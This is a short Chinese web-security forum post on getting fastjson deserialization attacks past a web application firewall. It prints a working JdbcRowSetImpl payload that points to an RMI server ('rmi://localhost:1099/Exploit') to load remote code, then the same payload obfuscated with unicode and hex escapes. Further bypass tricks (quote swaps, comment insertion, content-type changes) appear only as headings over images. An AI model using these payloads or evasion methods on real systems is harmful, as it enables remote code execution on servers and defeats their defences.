fastjson绕过waf-Web安全论坛-网络安全-讯岚社区

fastjson绕过waf

1.原请求

{“@type”:”com.sun.rowset.JdbcRowSetImpl”,”dataSourceName”:”rmi://localhost:1099/Exploit”,”autoCommit”:true}

2.多编码绕过

{“\u0040\u0074\u0079\u0070\u0065″:”\x63\x6f\x6d\x2e\x73\x75\x6e\x2e\x72\x6f\x77\x73\x65\x74\x2e\x4a\x64\x62\x63\x52\x6f\x77\x53\x65\x74\x49\x6d\x70\x6c”,”\u0064\u0061\u0074\u0061\u0053\u006f\u0075\u0072\u0063\u0065\u004e\u0061\u006d\u0065″:”rmi://localhost:1099/Exploit”,”\x61\x75\x74\x6f\x43\x6f\x6d\x6d\x69\x74″:true}

20240527152258436-e8d5cba102b52fa8f45a23b964bc324b_FmIe-HNcbm9352dkWCAoY2lTQ4DP

2.单引号替换双引号

20240527152312730-032c2eb48f5bfafacc5ac6f919bace53_FsnWUpeAilPWHDt_S6lhlITFkzJ1

3. ,替换空格

20240527152327469-ea9e908c997fbb30d892a8635dc19a1b_Fh5Vf-fEeyTHS_F64TrMEaUCw83b

4.注释绕过/**/

20240527152338812-6a4f625050918bd90c9a3e5c78dc4def_Fk96BzgrGVGJw8DXRhMEZAs5aSVj

5.使用-绕过

20240527152351976-7f716c27c00f26cbe5870a08e7845382_Fo-G1LBGeMh3CklhBpAote03ctZ6

6.使用_绕过

20240527152405754-44286113486449958967ac41b13605bf_FvlDG9wVe3HW0K3BvK_Fwha_lMxt

7.修改content-type */*

20240527152419206-371c403502489033724572d8c36770b2_FrRpY9oDifpuU1_odOAOO_dtWdvo

8.多重配合绕过20240527152433134-13188fc25e98c00cdd127ca099bc2d78_FnEL6Eax1TiLCZ1ov-ZZdBcILvp_

 

请登录后发表评论

    没有回复内容